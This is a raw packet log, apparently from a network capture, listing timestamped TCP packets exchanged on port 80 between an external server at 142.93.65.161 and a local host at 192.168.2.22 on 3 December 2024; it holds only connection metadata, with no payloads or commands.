                                                                                                                                                                                  Dec 3, 2024 14:01:40.915766001 CET8049177142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:40.915822983 CET8049177142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:40.915828943 CET4917780192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:40.917476892 CET8049177142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:40.917483091 CET8049177142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:40.917543888 CET4917780192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:40.919106960 CET8049177142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:40.919158936 CET8049177142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:40.919210911 CET4917780192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:40.920695066 CET8049177142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:40.920821905 CET8049177142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:40.920878887 CET4917780192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:40.922274113 CET8049177142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:40.922564030 CET8049177142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:40.922631979 CET4917780192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:40.923837900 CET8049177142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:40.923891068 CET8049177142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:40.923950911 CET4917780192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:40.925750971 CET8049177142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:40.925879955 CET8049177142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:40.925936937 CET4917780192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:40.927135944 CET8049177142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:40.927171946 CET8049177142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:40.927222013 CET4917780192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:40.928720951 CET8049177142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:40.928797007 CET8049177142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:40.928842068 CET4917780192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:40.930294037 CET8049177142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:40.930541992 CET8049177142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:40.930602074 CET4917780192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:40.931963921 CET8049177142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:40.932482004 CET8049177142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:40.932531118 CET4917780192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:40.933582067 CET8049177142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:40.933639050 CET8049177142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:40.933701038 CET4917780192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:40.935231924 CET8049177142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:40.935239077 CET8049177142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:40.935281038 CET4917780192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:40.937035084 CET8049177142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:40.937041998 CET8049177142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:40.937083006 CET4917780192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:40.938621044 CET8049177142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:40.938628912 CET8049177142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:40.938674927 CET4917780192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:40.940016985 CET8049177142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:40.940113068 CET8049177142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:40.940181017 CET4917780192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:40.941628933 CET8049177142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:40.941792011 CET8049177142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:40.941903114 CET4917780192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:40.943201065 CET8049177142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:40.943208933 CET8049177142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:40.943248987 CET4917780192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:40.944710970 CET8049177142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:40.944814920 CET8049177142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:40.944859982 CET4917780192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:40.946336031 CET8049177142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:40.946616888 CET8049177142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:40.946671963 CET4917780192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:40.947946072 CET8049177142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:40.948132992 CET8049177142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:40.948183060 CET4917780192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:40.949379921 CET8049177142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:40.949385881 CET8049177142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:40.949436903 CET4917780192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:40.950814009 CET8049177142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:40.951077938 CET8049177142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:40.951141119 CET4917780192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:40.952359915 CET8049177142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:40.952583075 CET8049177142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:40.952629089 CET4917780192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:40.953886986 CET8049177142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:40.953990936 CET8049177142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:40.954049110 CET4917780192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:40.955702066 CET8049177142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:40.955760002 CET8049177142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:40.955815077 CET4917780192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:40.956973076 CET8049177142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:40.957426071 CET8049177142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:40.957501888 CET4917780192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:40.958754063 CET8049177142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:40.958760023 CET8049177142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:40.958813906 CET4917780192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:40.960232019 CET8049177142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:40.960321903 CET8049177142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:40.960376978 CET4917780192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:40.961477041 CET8049177142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:40.961936951 CET8049177142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:40.961990118 CET4917780192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:40.963011026 CET8049177142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:40.963100910 CET8049177142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:40.963141918 CET4917780192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:40.964519978 CET8049177142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:40.964761972 CET8049177142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:40.964812040 CET4917780192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:40.966423035 CET8049177142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:40.966428995 CET8049177142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:40.966475964 CET4917780192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:40.967356920 CET8049177142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:40.967698097 CET8049177142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:40.967739105 CET4917780192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:40.968914032 CET8049177142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:40.968919992 CET8049177142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:40.968960047 CET4917780192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:40.970247984 CET8049177142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:40.970503092 CET8049177142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:40.970558882 CET4917780192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:40.971693993 CET8049177142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:40.971699953 CET8049177142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:40.971751928 CET4917780192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:40.973041058 CET8049177142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:40.973128080 CET8049177142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:40.973169088 CET4917780192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:40.974431038 CET8049177142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:40.974555969 CET8049177142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:40.974598885 CET4917780192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:40.975825071 CET8049177142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:40.975831985 CET8049177142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:40.975878954 CET4917780192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:40.977394104 CET8049177142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:40.977401018 CET8049177142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:40.977468967 CET4917780192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:40.978631020 CET8049177142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:40.978790998 CET8049177142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:40.978841066 CET4917780192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:40.979928970 CET8049177142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:40.979934931 CET8049177142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:40.979983091 CET4917780192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:40.981208086 CET8049177142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:40.981281996 CET8049177142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:40.981343031 CET4917780192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:40.982568979 CET8049177142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:40.982712030 CET8049177142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:40.982789040 CET4917780192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:40.984042883 CET8049177142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:40.984086990 CET8049177142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:40.984194994 CET4917780192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:40.985430956 CET8049177142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:40.985445976 CET8049177142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:40.985579967 CET4917780192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:40.986936092 CET8049177142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:41.117733002 CET8049177142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:41.117789984 CET4917780192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:41.117818117 CET8049177142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:41.118103981 CET8049177142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:41.118148088 CET4917780192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:41.118164062 CET8049177142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:41.118896008 CET8049177142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:41.118951082 CET4917780192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:41.119293928 CET8049177142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:41.119702101 CET8049177142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:41.119756937 CET4917780192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:41.120383978 CET8049177142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:41.120538950 CET8049177142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:41.120544910 CET8049177142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:41.120589972 CET4917780192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:41.121445894 CET8049177142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:41.121695042 CET8049177142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:41.121764898 CET4917780192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:41.122309923 CET8049177142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:41.122642040 CET8049177142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:41.122714043 CET4917780192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:41.122977972 CET8049177142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:41.123100996 CET8049177142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:41.123147964 CET4917780192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:41.123826981 CET8049177142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:41.124249935 CET8049177142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:41.124300003 CET4917780192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:41.124823093 CET8049177142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:41.124829054 CET8049177142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:41.124870062 CET4917780192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:41.125468969 CET8049177142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:41.125597954 CET8049177142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:41.125647068 CET4917780192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:41.126319885 CET8049177142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:41.126327038 CET8049177142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:41.126389980 CET4917780192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:41.127152920 CET8049177142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:41.127160072 CET8049177142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:41.127201080 CET4917780192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:41.127968073 CET8049177142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:41.128045082 CET8049177142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:41.128107071 CET4917780192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:41.128783941 CET8049177142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:41.129029036 CET8049177142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:41.129080057 CET4917780192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:41.129663944 CET8049177142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:41.129765987 CET8049177142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:41.129861116 CET4917780192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:41.130383015 CET8049177142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:41.130532026 CET8049177142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:41.130590916 CET4917780192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:41.131222963 CET8049177142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:41.131350994 CET8049177142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:41.131400108 CET4917780192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:41.132025003 CET8049177142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:41.132160902 CET8049177142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:41.132217884 CET4917780192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:41.132850885 CET8049177142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:41.132858038 CET8049177142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:41.132905960 CET4917780192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:41.133809090 CET8049177142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:41.133871078 CET8049177142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:41.133919954 CET4917780192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:41.134517908 CET8049177142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:41.134670019 CET8049177142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:41.134725094 CET4917780192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:41.135339022 CET8049177142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:41.135345936 CET8049177142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:41.135395050 CET4917780192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:41.136128902 CET8049177142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:41.136275053 CET8049177142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:41.136322975 CET4917780192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:41.137015104 CET8049177142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:41.137022018 CET8049177142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:41.137069941 CET4917780192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:41.137820005 CET8049177142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:41.137907982 CET8049177142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:41.137954950 CET4917780192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:41.138653040 CET8049177142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:41.138775110 CET8049177142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:41.138823986 CET4917780192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:41.139498949 CET8049177142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:41.139504910 CET8049177142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:41.139588118 CET4917780192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:41.140307903 CET8049177142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:41.140588999 CET8049177142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:41.140634060 CET4917780192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:41.141105890 CET8049177142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:41.141161919 CET8049177142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:41.141210079 CET4917780192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:41.141953945 CET8049177142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:41.141964912 CET8049177142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:41.142010927 CET4917780192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:41.142844915 CET8049177142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:41.142851114 CET8049177142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:41.142895937 CET4917780192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:41.143774986 CET8049177142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:41.143780947 CET8049177142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:41.143821955 CET4917780192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:41.144606113 CET8049177142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:41.144612074 CET8049177142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:41.144658089 CET4917780192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:41.145334959 CET8049177142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:41.145446062 CET8049177142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:41.145495892 CET4917780192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:41.146120071 CET8049177142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:41.146488905 CET8049177142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:41.146542072 CET4917780192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:41.147034883 CET8049177142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:41.147042036 CET8049177142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:41.147083998 CET4917780192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:41.147772074 CET8049177142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:41.147778034 CET8049177142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:41.147831917 CET4917780192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:41.148554087 CET8049177142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:41.148559093 CET8049177142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:41.148607969 CET4917780192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:41.149369001 CET8049177142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:41.149375916 CET8049177142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:41.149419069 CET4917780192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:41.150306940 CET8049177142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:41.150326967 CET8049177142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:41.150382996 CET4917780192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:41.150971889 CET8049177142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:41.151006937 CET8049177142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:41.151077986 CET4917780192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:41.151789904 CET8049177142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:41.151946068 CET8049177142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:41.152020931 CET4917780192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:41.152627945 CET8049177142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:41.152683973 CET8049177142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:41.152733088 CET4917780192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:41.153430939 CET8049177142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:41.153464079 CET8049177142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:41.153517008 CET4917780192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:41.154263020 CET8049177142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:41.154373884 CET8049177142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:41.154443979 CET4917780192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:41.155241013 CET8049177142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:41.155246973 CET8049177142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:41.155297041 CET4917780192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:41.155996084 CET8049177142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:41.156013012 CET8049177142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:41.156056881 CET4917780192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:41.156786919 CET8049177142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:41.157052040 CET8049177142.93.65.161192.168.2.22
